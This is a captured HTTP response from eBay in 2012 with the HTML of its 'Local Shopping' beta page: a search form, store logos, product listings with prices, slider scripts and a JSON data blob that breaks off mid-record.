Proxy-Connection: Keep-Alive
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac89d7fc
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: ebay=%5Ecv%3D15555%5E; Domain=.ebay.com; Path=/
Set-Cookie: s=CgAD4ACBPBpODYWM4OWQ3ZmMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MWNuut6f; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0ODYWM4OWQ3ZmMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MWMAywABTwVJCzFKVNFF; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 36736
Date: Thu, 05 Jan 2012 06:24:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
vjo.darwin.globalnav.util.EventReg.browseCategories("BrowseCategoriesMenu", "http://include.ebaystatic.com/categoryjs/99/en_US_MAIN/category_99en_US_MAIN0.js");
vjo.darwin.globalnav.util.EventReg.impression("AHtMRZjo*");
</script><script type="text/javascript">vjo.darwin.globalnav.util.DoctypeSupport.init();</script><script type="text/javascript">var _oGlobalNavRTMInfo={};_oGlobalNavRTMInfo.aRTMPlacementData=[];_oGlobalNavRTMInfo.aRTMPlacementData=[{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_433","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"433","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_876","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"876","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"160","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_912","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"912","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":true},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1650","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1650","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false},{"ord":null,"maxWidth":"470","renderOnScroll":false,"rtmUrl":"http://srx.main.ebayrtm.com/rtm","userId":null,"htmlId":"rtm_html_1651","GUid":null,"renderOnLoadAndScroll":false,"maxHeight":"22","pid":"1651","isUserSignin":false,"renderOnLoadAndScrollSiteSpeed":false,"renderBeforeOnload":false}];</script><!--@sghp@ headerStyle=HALF:HOMEPAGE:CGI @eghp@--><div id="CenterPanel" class="cntr"><div class="cont" style="margin-left:0">


<div class="srpbx" id="srpbx">
   <div class="srpbxLft">
   </div>

   <div style="padding:10px 10px 10px 25px"><span style="font-weight:bold;font-size:24px;color:#2F50BC;">Local Shopping <sup style="font-size:11px;color:#000">Beta</sup></span>
       <div style="font:normal small arial;padding-top:5px">Need it fast? Find what you're looking for in a store near you.</div>
   </div>
<!--    <div>
        <div class="srplb">Search locally to find the best deals in your area... <span class="rt">Right now, on eBay</span></div>
   </div>
-->    
   <div style="margin-left:-72px;z-index:5;position:relative;">
       <form action="/local/localsch.html" method="get" id="schfrm" onsubmit="return vjo.ebay.local.localmap.LocalMap.onSubmit();">
           <div class="fm-cnt">
               <div class="srps">
                   <input type="submit" id="but" value="Search" class="srpbt" tabindex="2" />
               </div>
               <div class="srpi">
                   <input type="text" id="searchbox" name="_nkw" placeholder="Search locally " autofocus="autofocus" autocomplete="off" tabindex="1" />
               </div>
               <div>                    
                       <span class="near-txt">Near</span><input class="zipcode" autocomplete="off" name="_location" id="_location" value="75217" size="50" title="Enter Location" tabindex="3" placeholder="Enter valid U.S ZIP Code">
                       <div id="autocomplete" class="autocomplete"></div>                        
                   
                       <a href="javascript:;" title="Change Location" type="change" id="loc_change" tabindex="4">Change</a>
                   <span id="err" style="display:none;color:red">Could not find the location.</span>
                   &nbsp;<a href="javascript:;" id="resetloc" style="">| <span>Current Location</span></a>
                   
                   <div class="clr"></div>
               </div>
               <div class="clr"></div>
           </div>
           
           <fontT><div class="srpMar"><b></b><span>Over 50,000 local stores including:</span>
           <span class="ff">
               <span class="fs" id="merchantFs">
           <span class="preS"><a class="pre db" id="pre" href="javascript:;" tabindex="6"></a></span>
       <div class="cntWrap" id="cntWrap1" style="width:252px;overflow:hidden">
    <div class="cnt" id="cnt1" style="width:10000px"><img title="Fry's Electronics" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3040.png"><img title="Best Buy" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1779.png"><img title="Sears" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1609.png"><img title="Micro Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/3713.png"><img title="Target" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1792.png"><img title="Staples" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1825.png"><img title="Armani Exchange" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12863.png"><img title="Loft" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12843.png"><img title="Sunglass Hut" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12850.png"><img title="JCPenney" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/6740.png"><img title="Nordstrom" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10390.png"><img title="Ikea" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/8615.png"><img title="Golf Smith" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5461.png"><img title="Office Depot" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1848.png"><img title="Toys R Us" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/5893.png"><img title="RadioShack" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/1829.png"><img title="Container Store" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/12861.png"><img title="Guitar Center" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/7374.png"><img title="Macy's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/10617.png"><img title="GameStop" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/9386.png"><img title="Lowe's" class="" src="http://static.milo.com/20111013163543/images/store_icons/flat_by_id/4483.png">
    </div>
       </div><span class="nextS"><a class="next enab " id="next" href="javascript:;" tabindex="7"></a></span>
       <div class="clr"></div>
               </span>
           </span>
           </div><fontT>
           <input type="hidden" id="_fpos" name="_fpos" value="75217">
           
               <input type="hidden" id="_trksid" name="_trksid" value="p5791.m1">
           
       </form>
   </div>
   <input type="hidden" id="zip" value="75217">
   
   <div style="position:absolute;right:25px;top:30px;color:#333;display:none;" id="loading"><span>Loading </span><img src="/local/images.i?file=miniThrobber.gif" /></div>
   
   
</div>    

<div id="map_canvas" class="mainmap"></div>

</div></div><div id="linfo" class="loc-info">    
   
   <div>
                               <div class="loc-ttl">
                                   <fontt><a id="ecArr" href="javascript:;"><b></b></a></fontt>
                               </div>
                               <div style="position: absolute; font-size: 10px; right: 10px;">Pricing &amp; inventory <a href="/local/disclaimer.html" target="blank">subject to Terms</a></div>
                               <div id="cntWrapper" class="loc-cntW">
                                   <table id="cntDiv" class="loc-cnt" style="width: 100%;table-layout:fixed" cellpadding="0" cellspacing="0">
                                   <tbody><tr>
                                   
                                       <td class="loc-tkt" align='center' >
                                           <div class="loc-cntTtl" >Popular Products</div>
                                           <div id="fsWrp1" class="loc-fsW" style="min-width:872px;max-width:1136px;" >
                                               <a id="fsLa1" href="javascript:;" class="loc-fsA loc-fsLd"></a>
                                               <div class="rImg">
                                                   <div id="fsCnt1" class="loc-fsCnt" style="min-width:872px;max-width:1136px;" >
                                                       <div id="fsDiv1" class="loc-fsItmW">
                                                       <div class="dealWrap" id="9163667" coords="32.931615,-96.821136,1779,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/176/063/200/11176849_14979063_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=9163667&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island - Xbox 360'>Dead Island - Xbox 360</a>
</div><div class="price"><span class="price">$29.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17746082" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/774/234/200/11774566_20472234_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17746082&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island (XBOX 360)'>Dead Island (XBOX 360)</a>
</div><div class="price"><span class="price">$49.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="7013767" coords="32.868267,-96.775289,10390,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/10390.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/008/064/188/200/8064013_8510188_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=7013767&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Jimmy Choo 'Candy' Clutch'>Jimmy Choo 'Candy' Clutch</a>
</div><div class="price"><span class="price">$550.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="19219195" coords="32.7203,-96.8303,1829,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1829.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/014/081/975/200/14081158_17396975_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=19219195&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Amazon Kindle 6" Wi-Fi.. eReader with Special Offers*'>Amazon Kindle 6" Wi-Fi.. eReader with Special Offers*</a>
</div><div class="price"><span class="price">$79.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="9432753" coords="32.874857,-96.76977,5893,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/582/865/200/10582490_13942865_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=9432753&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Monster High Monster Maker'>Monster High Monster Maker</a>
</div><div class="price"><span class="price">$19.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="16651770" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/441/700/200/11441688_15305700_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=16651770&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Dead Island for Xbox 360'>Dead Island for Xbox 360</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="2061731" coords="33.011124,-96.708589,1609,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1609.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/002/008/962/200/2008393_15313962_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=2061731&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Aluratek Libre eBook Reader Pro - 2GB SD Card, 100 Free Books, Built-In MP3 Player, White'>Aluratek Libre eBook Reader Pro - 2GB SD Card, 100 Free Books, Built-In MP3 Player, White</a>
</div><div class="price"><span class="price">$89.99<span class="sep">-</span>$118.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12108740" coords="32.865543,-96.793953,13363,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13363.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/011/107/994/200/11107646_14838994_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12108740&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Pyramid Wine Rack'>Pyramid Wine Rack</a>
</div><div class="price"><span class="price">$30.00</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12115369" coords="33.029941,-96.83243,5404,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5404.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/800/726/200/10800255_14294726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12115369&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Grier Wine Rack'>Grier Wine Rack</a>
</div><div class="price"><span class="price">$39.95</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":8276145,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":0,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":null,"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=8276145&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":true,"imageUrl":"http://imagethumbnails.milo.com/009/390/580/200/9390671_11239580_200.jpg","lowPrice":{"valueInMinorUnits":7999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":79990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":0,"title":"Camryn Metallic Raffia Tote","offerIds":"9390671","numLocalStore":1,"lowPriceValue":"$79.99","miloProductOfferModel":[{"merchantTitle":"Johnston & Murphy","merchantId":12847,"linkUrl":null,"location":{"merchantName":"Johnston & 